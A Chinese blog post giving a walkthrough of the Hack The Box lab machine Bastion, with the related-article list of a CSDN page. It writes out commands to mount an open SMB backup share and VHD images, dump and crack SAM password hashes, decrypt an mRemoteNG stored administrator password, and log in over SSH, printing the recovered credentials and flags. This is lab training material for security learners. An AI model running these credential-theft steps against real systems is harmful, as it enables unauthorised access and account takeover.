hackthebox-Tracks-CREST_CRT-Bastion

最新推荐文章于 2023-05-23 17:51:48 发布
最新推荐文章于 2023-05-23 17:51:48 发布
阅读量62 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/128967115
版权

列出共享

进入Backups目录

挂载文件到本地

sudo mount -t cifs //10.129.136.29/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC -o user=guest

现在使用 qemu-nbd 我们将挂载特定的 vhd 备份文件(参考链接 https://blog.51cto.com/u_15049775/4665849)。安装后我们进入 vhd 目录查看备份包含的文件。

对 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd 文件进行挂载

这里使用​​qemu-nbd​​来进行连接(使用-c参数为连接,使用-d参数断开连接)

sudo qemu-nbd -r -c /dev/nbd1 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd"

使用 fdisk 查看一下设备信息。

sudo fdisk -l /dev/nbd1

挂载分区

sudo mount -r /dev/nbd1p1 /mnt/vhd

退出挂载

退出qemu-nbd连接

sudo qemu-nbd -d /dev/nbd1

qemu-nbd 连接 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd 文件

sudo qemu-nbd -r -c /dev/nbd1 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

使用 fdisk 查看一下设备信息。

sudo fdisk -l /dev/nbd1

挂载分区

sudo mount -r /dev/nbd1p1 /mnt/vhd

在挂载目录下的 /Windows/System32/config 路径下

使用 samdump 脚本从这两个文件中提取凭据。

samdump2 ./SYSTEM ./SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

在解密网站上解密(https://www.somd5.com/)

获得凭证

L4mpje::bureaulampje

尝试使用凭证连接ssh

ssh L4mpje@10.129.136.29

获取普通用户flag

e270569a79ae39b96871df748af1e81e

mRemoteNG服务会存储相关账号密码,进行查找

打开confCons.xml

Username="Administrator" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5d

maPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

使用 mRemoteNG-Decrypt 脚本来解密密码

git clone https://github.com/haseebT/mRemoteNG-Decrypt.git

cd mRemoteNG-Decrypt/

python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5d

maPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

获取 Administrator::thXLHM96BeKL0ER2

SSH连接

ssh Administrator@10.129.136.29

获取管理员flag

a11ab9bd8ba1872cea634bed178b95b6

参考链接:

https://0xrick.github.io/hack-the-box/bastion/

https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/

:)--+
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
t3_Predicting the Markets w ML_sklearn_scatter_PairGrid_R-squared_log returns_Lasso_ridge_KNN_SVM_LR
Linli522362242的专栏
12-03 5632
In the last chapter, we learned how to design trading strategies, create trading signals, and implement advanced concepts, such as seasonality in trading instruments. Understanding those concepts in greater detail is a vast field comprising stochastic...
hackthebox - bastion (考点:smb & mount &vhd guestmount & sam hash & mRemoteNG 提权 )
冬萍子癸水
05-19 843
1 扫描 22想到可能有ssh登录,139 445是smb,要想到进去找敏感文件。 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1639
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4414
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8611
costmap_2d简介
memory-profiler
既然选择了远方 便只顾风雨兼程 - 永强
08-26 2457
memory-profiler https://pypi.org/project/memory-profiler/ A module for monitoring memory usage of a python program. 用于监视 python 程序的内存使用情况的模块。 1. Memory Profiler This is a python module for monitoring ...
Faster R-CNN论文翻译——中英文对照
热门推荐
SnailTyan
01-22 4万+
文章作者:Tyan 博客:noahsnail.com  |  CSDN  |  简书 声明:作者翻译论文仅为学习,如有侵权请联系作者删除博文,谢谢! 翻译论文汇总:https://github.com/SnailTyan/deep-learning-papers-translation Faster R-CNN: Towards Real-Time ...
Towards Real-Time Multi-Object Tracking(JDE)
qq_45033722的博客
07-27 2512
JDE
【网络仿真】ns-3基础(上)
bajiaoyu517的博客
09-11 4950
目标:看完《ns3》,重点:如何写拓扑、模块 1 ns-3初识 资料: ns-3官网:http://www.nsnam.org/ ns-3官方开发文档:https://www.nsnam.org/releases/ns-3-34/documentation/ ns-3维基百科(文档中没有的内容)、FAQ问题解答:https://www.nsnam.org/support/ ns-3相关文献:https://www.nsnam.org/education/ 2 ns-3快速上手 使用waf配置编译ns-3
AAAI2024 The Thirty-Eighth Conference on Artificial Intelligence
HelloWorld的博客
05-23 1万+
For information about past AAAI Conferences, please consult the following pages.https://aaai.org/conference/aaai/https://aaai.org/aaai-conference/2024 年 2 月在加拿大温哥华举行的第 38 届 AAAI 人工智能年度会议The 38th Annual AAAI Conference on Artificial IntelligenceMain Confere
Human-Falling-Detect-Tracks:AlphaPose + ST-GCN + SORT
04-14
人体跌倒检测与追踪使用Tiny-YOLO oneclass检测帧中的每个人,并使用获取骨骼姿势,然后使用模型从每个人跟踪的每30帧中预测动作。 现在支持7种动作:站立,行走,坐着,躺下,站起来,坐下,跌倒。...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
easyeda-round-tracks:EasyEDA的弯曲轨道和泪珠
05-04
easyeda-round-tracks 基于此扩展将舍入应用于EasyEDA中PCB上的铜走线。安装下载/克隆此存储库在浏览器或桌面中打开 在EasyEDA中,转到“高级”>“扩展名”>“扩展名设置...”>“加载扩展名...”>“选择文件...”。 ...
spotify-top-tracks
05-21
Spotify-Top-tracks 基于: : 适用于iOS 14的小部件,显示了过去四周内您收听次数最多的曲目。 安装 Spotify先决条件 1.)转到并创建一个新的应用程序2.)点击“编辑设置”,然后添加作为重定向URI。 3.)在编辑...
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简约大气毕业论文答辩PPT模板
07-11
【作品名称】:简约大气毕业论文答辩PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
创意灯泡毕业答辩PPT模板 (2)
07-11
【作品名称】:创意灯泡毕业答辩PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:创意灯泡毕业答辩PPT模板 (2)
总结汇报述职简介答辩培训美容课件PPT模板
最新发布
07-11
【作品名称】:总结汇报述职简介答辩培训美容课件PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
通过echarts根据hangzhou-tracks.json绘制地图
05-14
然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <meta charset="utf-8"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值